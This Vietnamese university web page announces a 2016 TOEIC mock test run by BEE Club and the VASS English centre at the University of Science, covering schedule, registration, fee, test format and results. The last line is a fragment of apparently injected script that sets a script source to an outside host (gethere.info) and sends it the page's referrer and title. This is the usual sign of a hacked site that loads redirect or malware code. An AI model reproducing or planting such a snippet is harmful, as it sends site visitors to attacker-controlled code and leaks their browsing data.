“THI THỬ TOEIC – TOEIC MOCK TEST”

32073

– Bạn đang đau đầu khi thời gian đăng ký xét duyệt “Sinh Viên 5 Tốt” sắp đến nhưng mãi vẫn còn thiếu tiêu chí “Hội Nhập Tốt”.

– Bạn muốn hiểu rõ trình độ tiếng Anh của bản thân để lựa chọn phương pháp học đúng đắn.

– Vậy thì “Thi Thử TOEIC – TOEIC Mock Test” chính là câu trả lời hoàn hảo dành cho bạn.

–  Với mong muốn hỗ trợ tối đa cũng như khuyến khích phong trào học ngoại ngữ trong cộng đồng sinh viên, BEE Club kết hợp cùng Trung tâm Anh ngữ VASS tổ chức chương trình   “Thi Thử TOEIC – TOEIC Mock Test” dành cho tất cả các bạn sinh viên.

mt16_web_doantn_851x315

1. Thời gian – Địa điểm

– Ngày 9/10/2016 ở cả 2 cơ sở của trường Đại học Khoa Học Tự Nhiên

+ Ca 1: 7:30 – 9:30

+ Ca 2: 10:00 – 12:00 cho từng ca thi vào

1. Hình thức đăng kí

– Đăng ký trực tiếp tại bàn đăng ký được BEE Club đặt tại 2 cơ sở của trường Đại học Khoa Học Tự Nhiên

Cơ sở 1 (227 Nguyễn Văn Cừ, Quận 5): Hành lang I

Cơ sở 2 (Thủ Đức – Dĩ An): Dãy hành lang D – E

– Thời gian đăng ký từ ngày 19/9/2016 đến 16h00 ngày 30/9/2016

– Lệ phí khi tham gia là 15.000 đồng cho mỗi thí sinh.

– Danh sách đăng ký, phòng thi các bạn theo dõi trên trang Fanpage BEE Club www.facebook.com/beeclub.khtn

1. Nội dung thi

– Do BEE Club phối hợp với trung tâm Anh ngữ VASS tổ chức nên nội dung và hình thức thi hoàn toàn theo chuẩn quốc tế gồm:

+ Listening: 100 câu – 45 phút

+ Reading:  100 câu – 75 phút

1. Thông báo và nhận kết quả

– Sinh viên theo dõi kết quả thi trên website Đoàn trường – HSV trường www.doantn.hcmus.edu.vn   và fanpage câu lạc bộ tiếng Anh BEE Club www.facebook.com/beeclub.khtn

– Sinh viên đang học tại trường Đại học Khoa học Tự nhiên có kết quả thi từ 450 điểm trở lên (tương đương trình độ B1) nhận giấy chứng nhận thi thử thông qua Đoàn khoa – Liên Chi Hội của từng khoa

– Sinh viên theo học tại các trường Đại học, Cao đẳng khác có kết quả thi từ 450 điểm trở lên (tương   đương trình độ B1) nhận giấy chứng nhận thi thử tại Văn phòng Đoàn (cơ sở 1 – 227 Nguyễn Văn Cừ, Phường 4, Quận 5).

Mọi thắc mắc liên hệ trực tiếp FanPage BEE Club www.facebook.com/beeclub.khtn

Hotline: 0976 243 139 (gặp Hoàng)

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;